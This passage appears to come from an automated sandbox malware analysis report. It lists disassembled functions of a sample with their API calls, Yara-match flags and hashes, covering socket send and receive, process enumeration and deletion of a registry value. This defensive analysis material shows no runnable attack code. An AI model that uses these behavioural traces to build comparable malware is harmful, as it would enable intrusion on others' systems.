                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 4268643673-0
                                                                                                  • Opcode ID: e6a0394b44a35eebdf0b4c332fd80b19040f46a1e6b9080a75b93617536fccd4
                                                                                                  • Instruction ID: 4dfc911ac006a12fe01a40bdb7020e710f0a1728260c353b6ae67ac4f28f0cbe
                                                                                                  • Opcode Fuzzy Hash: e6a0394b44a35eebdf0b4c332fd80b19040f46a1e6b9080a75b93617536fccd4
                                                                                                  • Instruction Fuzzy Hash: 600148B1D40310EF97249F6AA9D4415BBB4BF6871936189AEE4098A342C332CC1BCB94
                                                                                                  Function 02D048D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D048E1
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D048EC
                                                                                                  • Sleep.KERNEL32(00000258), ref: 02D048F9
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D04914
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0491D
                                                                                                  • Sleep.KERNEL32(0000012C), ref: 02D0492E
                                                                                                    • Part of subcall function 02D03F60: GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                    • Part of subcall function 02D03F60: send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                    • Part of subcall function 02D03F60: SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                    • Part of subcall function 02D03F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                    • Part of subcall function 02D03F60: WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                    • Part of subcall function 02D03F60: shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                    • Part of subcall function 02D03F60: closesocket.WS2_32(?), ref: 02D04025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 1019945655-0
                                                                                                  • Opcode ID: fab7b87ca8abb7daf3fe870f31beaf9cfe39be2e3a66ebde96d19ec1834aca48
                                                                                                  • Instruction ID: 95d8515c6655023586a6bf22037e0e46b1aab31617badb82e55a429d49af908e
                                                                                                  • Opcode Fuzzy Hash: fab7b87ca8abb7daf3fe870f31beaf9cfe39be2e3a66ebde96d19ec1834aca48
                                                                                                  • Instruction Fuzzy Hash: E5F090362046045BC320EBA9DC84D4AF3E9EFD8720B218B09F265833D0CA71EC01CBA0
                                                                                                  Function 02D03300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D03311
                                                                                                  • Sleep.KERNEL32(00000258), ref: 02D0331E
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D03326
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D03332
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D0333A
                                                                                                  • Sleep.KERNEL32(0000012C), ref: 02D0334B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 3137405945-0
                                                                                                  • Opcode ID: 7c94f639f8ed72d3b29e306cb0c26e29521fe8415cbf1c39bac4a451f80fbead
                                                                                                  • Instruction ID: 4a66a08041140acb8df1f8b02dede06a0994388121265b186c2c48cf1277aee1
                                                                                                  • Opcode Fuzzy Hash: 7c94f639f8ed72d3b29e306cb0c26e29521fe8415cbf1c39bac4a451f80fbead
                                                                                                  • Instruction Fuzzy Hash: 79F082722443146BD7209BA9DC84D46F3E8AF99334B214B09F221833D0CAB1EC05CB60
                                                                                                  Function 0282719F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction ID: b126a18c089ed38ce0e9b772dc16b5794f9ccfd763f19e3aa7f827bbe8ee288e
                                                                                                  • Opcode Fuzzy Hash: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction Fuzzy Hash: CA81F7759402287BEB21DB658C89FEBB77CEF99700F500098F709A6181DBB05B858F68
                                                                                                  Function 03FABA9B Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction ID: c70504e64c048d25bef9b601619478dbc4d3c6ca131e238ff4c3d70ddc57c341
                                                                                                  • Opcode Fuzzy Hash: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction Fuzzy Hash: 2F81C9B5940318BBE721DB658C89FEB77BCEF99701F504098F709A6180DBB05B858F64
                                                                                                  Function 02D2095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 02D2096E
                                                                                                    • Part of subcall function 02D208C9: ___BuildCatchObjectHelper.LIBCMT ref: 02D208FF
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 02D20985
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 02D20993
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 2163707966-3733052814
                                                                                                  • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction ID: f232811d6bd8ecdac7ed3076cab190dacc2aee2a5b88ca8b8d07a0e0c5d59d0a
                                                                                                  • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction Fuzzy Hash: 3C012F71001229BBEF12AF51CC44EAABF6AEF28399F048010BC4924660D732DDB5DBA0
                                                                                                  Function 00983A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 00983A63
                                                                                                    • Part of subcall function 009839BE: ___BuildCatchObjectHelper.LIBCMT ref: 009839F4
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00983A7A
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 00983A88
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 2163707966-3733052814
                                                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                  • Instruction ID: b22254a0a9eb8134070e9cada3d238cbbbdcbc7a874bdff47901cdbd51a0b718
                                                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                  • Instruction Fuzzy Hash: 9D01E431001109BBDF16BF65CC45EAA7E6AEF48750F108014BD5915221E776DAB1DBA1
                                                                                                  Function 02D0B7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 02D0B800
                                                                                                  • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 02D0B810
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0B81B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                  • String ID: Console$IpDatespecial
                                                                                                  • API String ID: 849931509-1840232981
                                                                                                  • Opcode ID: 175136c8453da59cfde813aa3e0e23ea3ded0f241a35de665e4fa5b455001304
                                                                                                  • Instruction ID: f81a95876a18d54c9e24fbd9330a25d50ef9d9edebf4fa4b68fea7448675a40e
                                                                                                  • Opcode Fuzzy Hash: 175136c8453da59cfde813aa3e0e23ea3ded0f241a35de665e4fa5b455001304
                                                                                                  • Instruction Fuzzy Hash: F6E02632680200AFE3348660BD0FFA9B364F7AC301F500A0DFA85A12408191E818C665
                                                                                                  Function 02D0B990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7A8163DF), ref: 02D0B9DA
                                                                                                  • _memset.LIBCMT ref: 02D0B9FB
                                                                                                  • _memset.LIBCMT ref: 02D0BA4B
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 02D0BA65
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D0BAB7
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2416807333-0
                                                                                                  • Opcode ID: 745e5f2b06b3106b035a3533c2caa908052c8a65f72c6cc446ba20ba4ca6c8d7
                                                                                                  • Instruction ID: d66246f68a72cc63b58178fa07f28090400bf67a45e28c18f9449e594cf91165
                                                                                                  • Opcode Fuzzy Hash: 745e5f2b06b3106b035a3533c2caa908052c8a65f72c6cc446ba20ba4ca6c8d7
                                                                                                  • Instruction Fuzzy Hash: 96412731A48214AFEB20DF60CCC5FAAB3B4EF14718F108255E9159B3D0E7B19E44CBA4
                                                                                                  Function 028295EF Relevance: 7.6, APIs: 5, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102557794-0
                                                                                                  • Opcode ID: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
                                                                                                  • Instruction ID: 724986f3a7fcec11b44c3852904156765bdd80bdf468b0c8b45d8d7c4afa73ec
                                                                                                  • Opcode Fuzzy Hash: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
                                                                                                  • Instruction Fuzzy Hash: D231C4BA6003656BE710DF69D880752B7D8BB58314F10813AD90DC7681F7B1E498CBA5
                                                                                                  Function 03FADEEB Relevance: 7.6, APIs: 5, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102557794-0
                                                                                                  • Opcode ID: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
                                                                                                  • Instruction ID: 60a1a863c7a322fea68d2e68fca58499bd8fd9a186b290dc0c26350517735911
                                                                                                  • Opcode Fuzzy Hash: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
                                                                                                  • Instruction Fuzzy Hash: 0031A4F6A04706ABE710DF6AD8A0B57B7A8BF48314F04853AE909CBA41E7B0E55487D1
                                                                                                  Function 02D03CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • recv.WS2_32(?,?,00000598,00000000), ref: 02D03CBF
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,02D0399F,?,?,00000000,000000FF,00000000), ref: 02D03CFA
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 02D03D45
                                                                                                  • WSAGetLastError.WS2_32(?,?,02D0399F,?,?,00000000,000000FF,00000000), ref: 02D03D7B
                                                                                                  • WSASetLastError.WS2_32(0000000D,?,?,02D0399F,?,?,00000000,000000FF,00000000), ref: 02D03DA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$recv
                                                                                                  • String ID:
                                                                                                  • API String ID: 316788870-0
                                                                                                  • Opcode ID: dc640e4c8b56dc98347dbb01f8419320be1a2d7fee7586696d5c49832a6c3cf6
                                                                                                  • Instruction ID: 1b7c2e8e9b56bda2ad74243f022594b3d5632d0ebc5b594b155b328b3fc815cc
                                                                                                  • Opcode Fuzzy Hash: dc640e4c8b56dc98347dbb01f8419320be1a2d7fee7586696d5c49832a6c3cf6
                                                                                                  • Instruction Fuzzy Hash: 8031C2726042008FEBA49F68D8C8B6A37A9FB84324F1105AAFD05CB3E5D771DC85CB65
                                                                                                  Function 00973CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • recv.WS2_32(?,?,00000598,00000000), ref: 00973CBF
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,0097399F,?,?,00000000,000000FF,00000000), ref: 00973CFA
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00973D45
                                                                                                  • WSAGetLastError.WS2_32(?,?,0097399F,?,?,00000000,000000FF,00000000), ref: 00973D7B
                                                                                                  • WSASetLastError.WS2_32(0000000D,?,?,0097399F,?,?,00000000,000000FF,00000000), ref: 00973DA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$recv
                                                                                                  • String ID:
                                                                                                  • API String ID: 316788870-0
                                                                                                  • Opcode ID: 00e49b9d0b3012186d1f08a0d07bdc8b9080952d1cda3607c96d74b054d99a8d
                                                                                                  • Instruction ID: cf25cae3dfe54c6be0feeeb05b88b5d23fac20aba12193504c5d1911c4abb5ea
                                                                                                  • Opcode Fuzzy Hash: 00e49b9d0b3012186d1f08a0d07bdc8b9080952d1cda3607c96d74b054d99a8d
                                                                                                  • Instruction Fuzzy Hash: BD3102736182008FEB249F68D8C8B6937A9FB84320F14C126ED0DDB396D731DD84AB51
                                                                                                  Function 02D10EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 02D10EF9
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • _free.LIBCMT ref: 02D10F0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  • Opcode ID: 0e7074bbcd4baa4cf8ab99cb49d133bf4f6c530a499bd0a4a3e42984daab326b
                                                                                                  • Instruction ID: 6cca715209a6ae5cb870433cfbede76f87d5b0cd3ab310c73cbe5b2bae1b6e2f
                                                                                                  • Opcode Fuzzy Hash: 0e7074bbcd4baa4cf8ab99cb49d133bf4f6c530a499bd0a4a3e42984daab326b
                                                                                                  • Instruction Fuzzy Hash: B3116032858615BECB313F74B84575A3756EF843A1F214525EC4997BD0DF31CD80CAA4
                                                                                                  Function 0097E5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0097E5E5
                                                                                                    • Part of subcall function 00976E83: __FF_MSGBANNER.LIBCMT ref: 00976E9C
                                                                                                    • Part of subcall function 00976E83: __NMSG_WRITE.LIBCMT ref: 00976EA3
                                                                                                    • Part of subcall function 00976E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976EC8
                                                                                                  • _free.LIBCMT ref: 0097E5F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  • Opcode ID: e85c70ef0820e106643dcff9bf87db316006175644332e22b174733c297abeea
                                                                                                  • Instruction ID: cf86cc8f39613abbfc585da7335d3152edea764dbd995b14392e17aacdf03230
                                                                                                  • Opcode Fuzzy Hash: e85c70ef0820e106643dcff9bf87db316006175644332e22b174733c297abeea
                                                                                                  • Instruction Fuzzy Hash: CA11EC3350C515ABCB222F74EC09B5E37999F993A0B25C8A5F44C9B251EF34CD509B94
                                                                                                  Function 009271F2 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 955811338-0
                                                                                                  • Opcode ID: 716a177d22a8d8e036915ba2596b5d7cb69e67a12362207e119646dd6be4c177
                                                                                                  • Instruction ID: 8b9f0c918680f777bc78dadd3c3a00249f8654976bf4288f455465a75af1f916
                                                                                                  • Opcode Fuzzy Hash: 716a177d22a8d8e036915ba2596b5d7cb69e67a12362207e119646dd6be4c177
                                                                                                  • Instruction Fuzzy Hash: 92110832108726EFDB11AFE5FC41E9BB7DCEF89370B100429F915AA19ADB31D81187A0
                                                                                                  Function 0282F3E8 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 955811338-0
                                                                                                  • Opcode ID: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
                                                                                                  • Instruction ID: 6b89c18a704b732c9c1bc081113ff2df7cb49d97a28b1395382b2206f9a50e00
                                                                                                  • Opcode Fuzzy Hash: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
                                                                                                  • Instruction Fuzzy Hash: FE11253E10032ABFEB11AFA89C40E9B37E9EF14364B10402AF618C6591DBB1D445CAE2
                                                                                                  Function 03FB3CE4 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 955811338-0
                                                                                                  • Opcode ID: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
                                                                                                  • Instruction ID: c500bd85289913382c80057bbf898fabb567dfd983e578b6acaf7067c8786f35
                                                                                                  • Opcode Fuzzy Hash: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
                                                                                                  • Instruction Fuzzy Hash: 6611E5BA64474ABFE710FFABDC81EDB77BCDF442A0B14002AF5148A150DB31D41186A1
                                                                                                  Function 02D02C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02D02C3F
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02D02C55
                                                                                                  • TranslateMessage.USER32(?), ref: 02D02C64
                                                                                                  • DispatchMessageW.USER32(?), ref: 02D02C6A
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D02C78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2015114452-0
                                                                                                  • Opcode ID: 1d236ee9cb602da45621b413868c647b8fdd4bb8002bda828c4b4844c254e3bf
                                                                                                  • Instruction ID: 800b91bd97067164afe2f7caded5f22f0745f569aec83839ad895151953f2c64
                                                                                                  • Opcode Fuzzy Hash: 1d236ee9cb602da45621b413868c647b8fdd4bb8002bda828c4b4844c254e3bf
                                                                                                  • Instruction Fuzzy Hash: E201D632A91309B6E720D6949CCDFBA736CAB04B10F504501FF10EA2D0D6A1FC05C7A8
                                                                                                  Function 00972BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
